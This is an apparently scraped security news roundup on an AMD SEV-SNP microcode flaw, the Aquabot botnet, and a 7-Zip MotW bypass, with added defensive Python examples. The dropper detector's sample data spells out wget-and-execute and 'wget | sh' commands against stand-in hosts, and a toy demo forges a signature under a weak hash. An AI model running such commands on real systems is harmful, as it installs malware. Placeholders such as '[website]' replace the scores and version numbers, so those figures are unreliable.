Russian Cybercrime Groups Exploiting 7-Zip Flaw to Bypass Windows MotW Protections
AMD SEV-SNP Vulnerability Allows Malicious Microcode Injection with Admin Access

A security vulnerability has been disclosed in AMD's Secure Encrypted Virtualization (SEV) that could permit an attacker to load malicious CPU microcode under specific conditions.
The flaw, tracked as CVE-2024-56161, carries a CVSS score of [website] out of [website], indicating high severity.
"Improper signature verification in AMD CPU ROM microcode patch loader may allow an attacker with local administrator privilege to load malicious CPU microcode resulting in loss of confidentiality and integrity of a confidential guest running under AMD SEV-SNP," AMD presented in an advisory.
The chipmaker credited Google security researchers Josh Eads, Kristoffer Janke, Eduardo Vela, Tavis Ormandy, and Matteo Rizzo for discovering and reporting the flaw on September 25, 2024.
SEV is a security feature that uses a unique key per virtual machine to isolate virtual machines (VMs) and the hypervisor from one another. SNP, which stands for Secure Nested Paging, incorporates memory integrity protections to create an isolated execution environment and safeguard against hypervisor-based attacks.
"SEV-SNP introduces several additional optional security enhancements designed to support additional VM use models, offer stronger protection around interrupt behavior, and offer increased protection against in recent times disclosed side channel attacks," .
In a separate bulletin, Google noted that CVE-2024-56161 stems from an insecure hash function in the signature validation for microcode updates, which opens the door to a scenario where an adversary could compromise confidential computing workloads.
Google has also released a test payload to demonstrate the vulnerability, but is withholding further technical details for another month to give the fix time to propagate across the "deep supply chain."
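The security point behind "insecure hash function in the signature validation" is that a hash-then-sign check is only as strong as the hash: if an attacker can find a second input with the same digest, the vendor's genuine signature validates the forgery unchanged. The following toy loader is an added illustration written for this page, not AMD's code or Google's test payload. It stands in an HMAC under a hypothetical vendor key for the real asymmetric signature, and uses a 16-bit truncation of SHA-256 as the deliberately weak digest so the second-preimage search finishes in well under a second.

```python
"""Why an insecure hash breaks a signature check on microcode updates.

A loader that verifies sign(H(patch)) trusts H as much as the signature:
an attacker who can find a second patch with the same H output reuses the
vendor's genuine signature unchanged. This toy loader is constructed for
this page and is not AMD's code: an HMAC-SHA256 under a vendor key stands
in for the real asymmetric signature, and a 16-bit truncation of SHA-256
plays the deliberately weak digest.
"""
import hashlib
import hmac

# Hypothetical vendor secret; in the real design this is the vendor's private key.
VENDOR_KEY = b"hypothetical-vendor-signing-key"


def weak_digest(data: bytes) -> bytes:
    """Deliberately weak: 16-bit output, so a second preimage costs ~2^16 tries."""
    return hashlib.sha256(data).digest()[:2]


def strong_digest(data: bytes) -> bytes:
    """Full SHA-256: no feasible second preimage."""
    return hashlib.sha256(data).digest()


def sign(patch: bytes, digest) -> bytes:
    """Vendor side: hash-then-sign, as real signature schemes do."""
    return hmac.new(VENDOR_KEY, digest(patch), hashlib.sha256).digest()


def loader_accepts(patch: bytes, signature: bytes, digest) -> bool:
    """Loader side: recompute the digest, check the signature in constant time."""
    return hmac.compare_digest(sign(patch, digest), signature)


def forge(genuine: bytes, digest, prefix: bytes, budget: int = 1 << 24) -> bytes:
    """Attacker side: search for a patch starting with `prefix` whose digest
    equals the genuine patch's digest (a second preimage). Only feasible when
    the digest is short; with strong_digest this exhausts the budget."""
    target = digest(genuine)
    for counter in range(budget):
        candidate = prefix + counter.to_bytes(8, "little")
        if candidate != genuine and digest(candidate) == target:
            return candidate
    raise RuntimeError("no second preimage found within budget")


def demo() -> dict:
    """Run the attack against both digests and report what the loader accepts."""
    genuine = b"GENUINE MICROCODE PATCH v1"
    malicious_prefix = b"MALICIOUS PATCH "
    # Weak digest: the vendor's signature over the genuine patch validates the forgery.
    weak_sig = sign(genuine, weak_digest)
    forged = forge(genuine, weak_digest, malicious_prefix)
    # Strong digest: the same forgery fails the same check.
    strong_sig = sign(genuine, strong_digest)
    return {
        "forged": forged,
        "weak_accepts_genuine": loader_accepts(genuine, weak_sig, weak_digest),
        "weak_accepts_forged": loader_accepts(forged, weak_sig, weak_digest),
        "strong_accepts_genuine": loader_accepts(genuine, strong_sig, strong_digest),
        "strong_accepts_forged": loader_accepts(forged, strong_sig, strong_digest),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

The takeaway for anyone reviewing an update-verification path: the signature primitive can be perfectly sound and the check still worthless if the digest it covers is not second-preimage resistant. Note that, as the advisory says, the real attack still requires local administrator privilege on the host; the example shows only why the check fails, not how microcode is delivered.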
New Aquabot Botnet Exploits CVE-2024-41710 in Mitel Phones for DDoS Attacks

A Mirai botnet variant dubbed Aquabot has been observed actively attempting to exploit a medium-severity security flaw impacting Mitel phones in order to ensnare them into a network capable of mounting distributed denial-of-service (DDoS) attacks.
The vulnerability in question is CVE-2024-41710 (CVSS score: [website]), a command injection in the boot process that could allow a malicious actor to execute arbitrary commands within the context of the phone.
It affects Mitel 6800 Series, 6900 Series, 6900w Series SIP Phones, and Mitel 6970 Conference Unit. It was addressed by Mitel in mid-July 2024. A proof-of-concept (PoC) exploit for the flaw became publicly available in August.
Outside of CVE-2024-41710, some of the other vulnerabilities targeted by the botnet include CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, CVE-2023-26801, and a remote code execution flaw targeting Linksys E-series devices.
"Aquabot is a botnet that was built off the Mirai framework with the ultimate goal of distributed denial-of-service (DDoS)," Akamai researchers Kyle Lefton and Larry Cashdollar noted. "It has been known since November 2023."
The web infrastructure company said it has detected active exploitation attempts against CVE-2024-41710 since early January 2025, with the attacks using a "payload almost identical to the PoC" to deploy the botnet malware.
The attack involves executing a shell script that, in turn, uses the "wget" command to retrieve Aquabot for different CPU architectures.
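The dropper stage described above (a shell script that fetches one binary per CPU architecture with wget, marks it executable and runs it) is a pattern that can be scored from captured request bodies or shell history. The following detector is an added example written for this page, not Akamai's logic, and the sample commands are constructed, using addresses from the documentation range 198.51.100.0/24 rather than real infrastructure.

```python
"""Flag Mirai-style dropper one-liners in captured command strings.

Added example for this page, not Akamai's detection logic. It scores a
command on the traits the text describes: fetching a binary per CPU
architecture with wget (or curl/tftp), making it executable, and running it
from a world-writable directory. Sample inputs are constructed; the IP
addresses are from the documentation range (198.51.100.0/24).
"""
import re

ARCH_HINTS = ("arm", "arm5", "arm6", "arm7", "mips", "mpsl", "mipsel", "x86", "i686",
              "i586", "ppc", "sh4", "m68k", "spc", "sparc", "aarch64", "x86_64")
FETCH_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s;'\"|&]+")
CHMOD_RE = re.compile(r"\bchmod\s+(?:[ugoa]*\+x|[0-7]*7[0-7]*)\b")
EXEC_RE = re.compile(r"(?:^|[;&|]\s*)\./[\w./-]+")
PIPE_SH_RE = re.compile(r"\|\s*(?:ba|da)?sh\b")
TMP_DIR_RE = re.compile(r"\bcd\s+(?:/tmp|/var/tmp|/var/run|/dev/shm|/dev)\b")
DROPPER_THRESHOLD = 3


def arch_names(urls):
    """CPU-architecture tokens found in the file names of fetched URLs."""
    names = set()
    for url in urls:
        filename = url.rsplit("/", 1)[-1].lower()
        names.update(a for a in ARCH_HINTS if a in filename)
    return names


def score_dropper(cmd):
    """Return (score, reasons) for one command string; score >= 3 means dropper."""
    score, reasons = 0, []
    urls = URL_RE.findall(cmd)
    if FETCH_RE.search(cmd):
        score += 1
        reasons.append("download tool")
    if TMP_DIR_RE.search(cmd):
        score += 1
        reasons.append("cd into world-writable dir")
    if CHMOD_RE.search(cmd):
        score += 1
        reasons.append("chmod executable")
    if EXEC_RE.search(cmd):
        score += 1
        reasons.append("executes ./file")
    if PIPE_SH_RE.search(cmd):
        score += 2
        reasons.append("pipes download into shell")
    archs = arch_names(urls)
    if len(archs) >= 2:
        score += 2
        reasons.append(f"multi-arch payloads: {sorted(archs)}")
    return score, reasons


def is_dropper(cmd):
    return score_dropper(cmd)[0] >= DROPPER_THRESHOLD


SAMPLE_COMMANDS = [  # constructed samples, not real captures
    "cd /tmp; wget http://198.51.100.7/bins/aqua.arm7 -O a7; chmod 777 a7; ./a7; "
    "wget http://198.51.100.7/bins/aqua.mips -O mp; chmod 777 mp; ./mp",
    "wget http://198.51.100.7/x.sh -O - | sh",
    "wget https://example.com/releases/tool-1.2.tar.gz && tar xzf tool-1.2.tar.gz",
    "ls -la /var/log",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        score, reasons = score_dropper(cmd)
        label = "DROPPER" if score >= DROPPER_THRESHOLD else "ok"
        print(f"{label:8}{score} {reasons} :: {cmd[:60]}")
```

The multi-architecture signal is the one worth weighting: a legitimate admin fetching a release tarball trips the download check alone, while a botnet loader that sprays arm7, mips and x86 binaries at whatever device it landed on rarely looks like anything else.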
The Aquabot variant spotted in the attack has been assessed to be the third iteration of the malware, sporting a novel "report_kill" function that reports back to the command-and-control (C2) server when a kill signal is caught on the infected device. To date, however, sending this information has not been observed to elicit any response from the server.
Besides triggering C2 communication upon detecting certain signals, this new version renames itself to "[website]" to avoid attracting attention and is programmed to terminate processes that match certain criteria, such as local shells. The signal handling is suspected to be groundwork for stealthier variants, or a way to detect interference from competing botnets.
There is some evidence suggesting that the threat actors behind Aquabot are offering the network of compromised hosts as a DDoS service on Telegram under the monikers Cursinq Firewall, The Eye Services, and The Eye Botnet.
The development is a sign that Mirai continues to plague a wide range of internet-connected devices that often lack proper security features, have reached end-of-life, or are left accessible with default configurations and passwords, making them low-hanging fruit for exploitation and a key conduit for DDoS attacks.
"Threat actors commonly claim that the botnet is used only for DDoS mitigation testing purposes to try to mislead researchers or law enforcement," the researchers stated.
"Threat actors will claim it's just a PoC or something educational, but a deeper analysis demonstrates that they are in fact advertising DDoS as a service, or the owners are boasting about running their own botnet on Telegram."
Russian Cybercrime Groups Exploiting 7-Zip Flaw to Bypass Windows MotW Protections

A recently patched security vulnerability in the 7-Zip archiver was exploited in the wild to deliver the SmokeLoader malware.
The flaw, CVE-2025-0411 (CVSS score: [website]), allows remote attackers to circumvent mark-of-the-web (MotW) protections and execute arbitrary code in the context of the current user. 7-Zip addressed it in November 2024 with version [website].
"The vulnerability was actively exploited by Russian cybercrime groups through spear-phishing campaigns, using homoglyph attacks to spoof document extensions and trick clients and the Windows Operating System into executing malicious files," Trend Micro security researcher Peter Girnus stated.
It's suspected that CVE-2025-0411 was likely weaponized to target governmental and non-governmental organizations in Ukraine as part of a cyber espionage campaign set against the backdrop of the ongoing Russo-Ukrainian conflict.
MotW is a Windows security feature that tags files downloaded from the internet (on NTFS, via a Zone.Identifier alternate data stream) so that Microsoft Defender SmartScreen and other consumers of the tag perform additional checks before the file is opened or executed, rather than letting it run automatically.
CVE-2025-0411 bypasses MotW through double archiving with 7-Zip: the attacker creates an archive and then an archive of that archive, so that the malicious payload inside the inner archive is extracted without the tag.
"The root cause of CVE-2025-0411 is that prior to version [website], 7-Zip did not properly propagate MotW protections to the content of double-encapsulated archives," Girnus explained. "This allows threat actors to craft archives containing malicious scripts or executables that will not receive MotW protections, leaving Windows users vulnerable to attacks."
Attacks leveraging the flaw as a zero-day were first detected in the wild on September 25, 2024, with the infection sequences leading to SmokeLoader, a loader malware that has been repeatedly used to target Ukraine.
The starting point is a phishing email that contains a specially-crafted archive file that, in turn, employs a homoglyph attack to pass off the inner ZIP archive as a Microsoft Word document file, effectively triggering the vulnerability.
"The use of these compromised email accounts lend an air of authenticity to the emails sent to targets, manipulating potential victims into trusting the content and their senders," Girnus pointed out.
This approach leads to the execution of an internet shortcut (.URL) file present within the ZIP archive, which points to an attacker-controlled server hosting another ZIP file. The newly downloaded ZIP contains the SmokeLoader executable that's disguised as a PDF document.
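The three tricks in this chain (an archive nested inside an archive, an inner archive whose name imitates a Word document with a look-alike character, and a .URL shortcut as the first-stage payload) can all be checked before anything is extracted, by walking the archive by content rather than by filename. The inspector below is an added example written for this page, not Trend Micro's or 7-Zip's code. The sample archive is constructed in memory, and the Cyrillic "о" (U+043E) in ".dоc" is an assumed homoglyph, since the page does not state which character the campaign used.

```python
"""Inspect an archive for the double-archiving and homoglyph tricks above.

Added example for this page; not Trend Micro's or 7-Zip's code. It walks
ZIP-in-ZIP members by content (a member is treated as an archive if its
bytes are a ZIP, whatever its name says), flags extensions that spoof a
document type with non-ASCII look-alike letters, and flags .url shortcuts
and executables. The sample archive is constructed in memory; the Cyrillic
'o' (U+043E) in '.doc' is an assumed homoglyph.
"""
import io
import unicodedata
import zipfile

# Subset of Unicode confusables: Cyrillic letters that render like Latin ones.
CONFUSABLES = {
    "\u0430": "a", "\u0441": "c", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0455": "s", "\u0458": "j",
    "\u0501": "d",
}
DANGEROUS_EXT = {".url", ".lnk", ".exe", ".scr", ".js", ".vbs", ".bat", ".cmd", ".ps1", ".hta"}
MAX_DEPTH = 4  # refuse to recurse forever into nested archives


def skeleton(text):
    """Map look-alike characters to their ASCII twins (NFKC first, for fullwidth forms)."""
    return "".join(CONFUSABLES.get(c, c) for c in unicodedata.normalize("NFKC", text))


def extension(name):
    """Lower-cased extension of the last path component, or '' if there is none."""
    base = name.rsplit("/", 1)[-1]
    return ("." + base.rsplit(".", 1)[1].lower()) if "." in base else ""


def spoofed_extension(name):
    """Return the ASCII extension a non-ASCII extension imitates, or None."""
    ext = extension(name)
    if ext.isascii():
        return None
    ascii_ext = skeleton(ext)
    return ascii_ext if ascii_ext != ext and ascii_ext.isascii() else None


def inspect_zip(data, depth=0, path=""):
    """Return (kind, member_path, detail) findings for an in-memory ZIP,
    recursing into members that are themselves ZIPs regardless of their name."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            full = f"{path}/{info.filename}" if path else info.filename
            fake = spoofed_extension(info.filename)
            if fake:
                findings.append(("spoofed-extension", full, f"looks like {fake}"))
            if skeleton(extension(info.filename)) in DANGEROUS_EXT:
                findings.append(("dangerous-type", full, extension(info.filename)))
            blob = zf.read(info)
            if zipfile.is_zipfile(io.BytesIO(blob)):
                findings.append(("nested-archive", full, f"depth {depth + 1}"))
                if depth + 1 < MAX_DEPTH:
                    findings.extend(inspect_zip(blob, depth + 1, full))
    return findings


def build_sample():
    """Constructed sample: outer.zip -> 'Report.dоc' (really a ZIP) -> 'Report.url'."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("Report.url", "[InternetShortcut]\r\nURL=http://203.0.113.10/next.zip\r\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Report.d\u043ec", inner.getvalue())
        z.writestr("readme.txt", "benign text")
    return outer.getvalue()


if __name__ == "__main__":
    for kind, member, detail in inspect_zip(build_sample()):
        print(f"{kind:18} {member}  ({detail})")
```

Sniffing members by content is what matters here: the inner archive's spoofed name would pass an extension allow-list, and a Word document that is actually a ZIP of a .URL file is exactly the shape this chain takes. Inspection is a mail-gateway or sandbox control, not a replacement for updating 7-Zip, which is what actually restores MotW propagation on the endpoint.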
At least nine Ukrainian government entities and other organizations have been assessed to be impacted by the campaign, including the Ministry of Justice, Kyiv Public Transportation Service, Kyiv Water Supply Company, and City Council.
In light of the active exploitation of CVE-2025-0411, users are advised to update their 7-Zip installations to the latest version, implement email filtering to block phishing attempts, and disable the execution of files from untrusted sources.
"One interesting takeaway we noticed in the organizations targeted and affected in this campaign is smaller local government bodies," Girnus showcased.
"These organizations are often under intense cyber pressure yet are often overlooked, less cyber-savvy, and lack the resources for a comprehensive cyber strategy that larger government organizations have. These smaller organizations can be valuable pivot points by threat actors to pivot to larger government organizations."